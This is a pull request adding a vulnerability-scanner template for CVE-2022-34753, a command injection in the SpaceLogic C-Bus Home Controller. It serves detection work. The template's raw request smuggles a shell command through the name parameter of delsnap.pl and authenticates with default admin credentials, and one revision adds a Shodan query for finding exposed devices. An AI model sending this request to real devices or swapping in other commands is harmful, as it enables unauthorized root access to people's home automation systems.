### PR TITLE
Create CVE-2022-34753.yaml

### DIFF
--- a/cves/2022/CVE-2022-34753.yaml
+++ b/cves/2022/CVE-2022-34753.yaml
@@ -7,30 +7,26 @@ info:
   description: |
     A CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability exists that could cause remote root exploit when the command is compromised. Affected Products SpaceLogic C-Bus Home Controller (5200WHC2), formerly known as C-Bus Wiser Homer Controller MK2 (V1.31.460 and prior)
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-34753
     - https://www.zeroscience.mk/codes/SpaceLogic.txt
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-34753
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 8.8
     cve-id: CVE-2022-34753
-    cwe-id: CWE-78
-  tags: cve,cve2022,iot,schneider,rce,oast
+  metadata:
+    shodan-query: html:"SpaceLogic C-Bus"
+  tags: cve,cve2022,iot,spacelogic,rce,oast
 
 requests:
   - raw:
       - |
         GET /delsnap.pl?name=|id HTTP/1.1
         Host: {{Hostname}}
-        Authorization: Basic YWRtaW46YWRtaW4=
+        Authorization: Basic {{base64('{{username}}:' + '{{password}}')}}
 
     matchers-condition: and
     matchers:
-      - type: word
-        part: body
-        words:
-          - "uid="
-          - "gid="
-        condition: and
+      - type: regex
+        regex:
+          - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
 
       - type: status
         status:

--- a/cves/2022/CVE-2022-34753.yaml
+++ b/cves/2022/CVE-2022-34753.yaml
@@ -1,0 +1,37 @@
+id: CVE-2022-34753
+
+info:
+  name: SpaceLogic C-Bus Home Controller - Remote Code Execution
+  author: gy741
+  severity: high
+  description: |
+    A CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability exists that could cause remote root exploit when the command is compromised. Affected Products SpaceLogic C-Bus Home Controller (5200WHC2), formerly known as C-Bus Wiser Homer Controller MK2 (V1.31.460 and prior)
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-34753
+    - https://www.zeroscience.mk/codes/SpaceLogic.txt
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2022-34753
+    cwe-id: CWE-78
+  tags: cve,cve2022,iot,schneider,rce,oast
+
+requests:
+  - raw:
+      - |
+        GET /delsnap.pl?name=|id HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Basic YWRtaW46YWRtaW4=
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "uid="
+          - "gid="
+        condition: and
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2022-34753

```
A CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability exists that could cause remote root exploit when the command is compromised. Affected Products SpaceLogic C-Bus Home Controller (5200WHC2), formerly known as C-Bus Wiser Homer Controller MK2 (V1.31.460 and prior)
```
- References: 
   -  https://www.zeroscience.mk/codes/SpaceLogic.txt
   - https://www.cleverhome.com.au/manuals/Clipsal-C-Bus-WHC2_5918-Wiser-Home-Controller-2-Installation.pdf

### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO